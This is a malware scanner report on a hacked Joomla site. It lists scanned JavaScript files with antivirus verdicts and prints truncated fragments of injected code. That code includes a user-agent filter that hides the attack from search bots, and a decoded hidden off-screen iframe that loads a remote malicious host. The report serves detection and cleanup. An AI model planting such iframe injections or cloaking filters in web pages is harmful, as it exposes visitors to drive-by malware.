
Malware Scanner report for matveeva-lichnost.ru

Malicious/Suspicious/Total urls checked
3/6/15
9 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "matveeva-lichnost.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
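Malicious/Hidden/Total iFrames
0/0/0 (this count appears to cover iframe tags found in the fetched page markup only; the hidden iframe shown under "Decoded script" below is produced by the injected JavaScript and is not included in it)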
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=matveeva-lichnost.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://matveeva-lichnost.ru/

Result: The website is marked by Yandex as suspicious — visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request | Server response | Status
http://matveeva-lichnost.ru/
200 OK
Content-Length: 40684
Content-Type: text/html
clean
http://matveeva-lichnost.ru/plugins/system/jceutilities/js/jceutilities.js?v=2.2.3
200 OK
Content-Length: 28221
Content-Type: application/javascript
clean
http://matveeva-lichnost.ru/plugins/system/mediaobject/js/mediaobject-150.js
200 OK
Content-Length: 5407
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3585 bytes are skipped ...
);
}
}
// Thin wrappers: each forwards its single argument unchanged to the
// MediaObject method of the matching media type.
// NOTE(review): these look like the tail of the original mediaobject script
// rather than the injected code that precedes them; confirm against a
// known-good copy of the plugin before restoring the file.
function writeFlash(p) {
MediaObject.flash(p);
}
function writeShockWave(p) {
MediaObject.shockwave(p);
}
function writeQuickTime(p) {
MediaObject.quicktime(p);
}
function writeRealMedia(p) {
MediaObject.realmedia(p);
}
function writeWindowsMedia(p) {
MediaObject.windowsmedia(p);
}
function writeDivX(p) {
MediaObject.divx(p);
}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
AVG
HTML/Framer
Sophos
Troj/JSRedir-LH

http://matveeva-lichnost.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2
200 OK
Content-Length: 28716
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3315 bytes are skipped ...
be: function(o,g){return this.ajax('JCommentsSubscribe',arguments);},
unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);},
updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}},
go: function(l){window.open(l);return;}
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://matveeva-lichnost.ru/components/com_jcomments/libraries/joomlatune/ajax.js
200 OK
Content-Length: 5515
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3506 bytes are skipped ...
': if(obj){eval("obj."+property+"=data;");} break;
case 'al': if(data){alert(data);} break;
case 'js': if(data){eval(data);} break;
default: this.error('Unknown command: ' + cmd);break;
}
}

delete result;
delete cmd;
delete id;
delete property;
delete data;
delete obj;
return true;
};
this.error = function(){};
}
var jtajax = new jtAJAX();
};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://matveeva-lichnost.ru/media/system/js/caption.js
200 OK
Content-Length: 3500
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[2637 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/plugins/system/modalizer/modals/jquery.min.js
404 Not Found
Content-Length: 243
Content-Type: text/html
clean
http://matveeva-lichnost.ru/test404page.js
404 Not Found
Content-Length: 212
Content-Type: text/html
clean
http://matveeva-lichnost.ru/plugins/system/modalizer/modals/fancybox/jquery.fancybox-1.3.1.pack.js
200 OK
Content-Length: 14731
Content-Type: application/javascript
clean
http://matveeva-lichnost.ru/plugins/content/highslide/highslide-with-html.js
200 OK
Content-Length: 64409
Content-Type: application/javascript
clean
http://matveeva-lichnost.ru/plugins/content/highslide/swfobject.js
200 OK
Content-Length: 8426
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[3752 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/plugins/content/highslide/do_cookie.js
200 OK
Content-Length: 3994
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[3369 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/templates/matveeva3/script.js
200 OK
Content-Length: 12592
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[4019 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/modules/mod_pagepeel_banner/pagepeel_banner/AC_OETags.js
200 OK
Content-Length: 9364
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[4099 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

http://matveeva-lichnost.ru/modules/mod_googlecurrencyconverter/mod_googlecurrencyconverter_ajax.js
200 OK
Content-Length: 4788
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
/**
 * Case-insensitive substring search: both arguments are coerced to strings
 * and lower-cased before indexOf() is applied.
 *
 * @param {*} f_haystack - value to search in (string-coerced).
 * @param {*} f_needle - value to search for (string-coerced).
 * @param {number} [f_offset] - start position handed to indexOf().
 * @returns {number|boolean} index of the first match, or false when there is none.
 *
 * NOTE(review): a match at position 0 returns 0, which is falsy; only a strict
 * comparison with false separates "found at start" from "not found".
 * NOTE(review): presumably used to test the visitor's user-agent against the
 * `denygros` token list declared below; the calling code is in the skipped
 * bytes, so this is unconfirmed.
 */
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
// The initial 0 is overwritten by the assignment inside the condition below.
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire
...[4453 bytes skipped]...

Decoded script:


<iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: matveeva-lichnost.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 27 Sep 2014 10:14:30 GMT
Pragma: no-cache
Server: nginx/1.7.0
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 27 Sep 2014 10:14:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cfbd16b4c51a0eeaa3697595e5323185=vpdo8rpkjen428ts095ojkmh13; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: matveeva-lichnost.ru
Referer: http://www.google.com/search?q=matveeva-lichnost.ru

Result:
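The result is similar to the first query; no suspicious redirects were found. Both queries compare only the HTTP responses returned by the server, so the hidden iframe reported under "Scanned pages/files", which comes from JavaScript files loaded by the page, does not show up in this check.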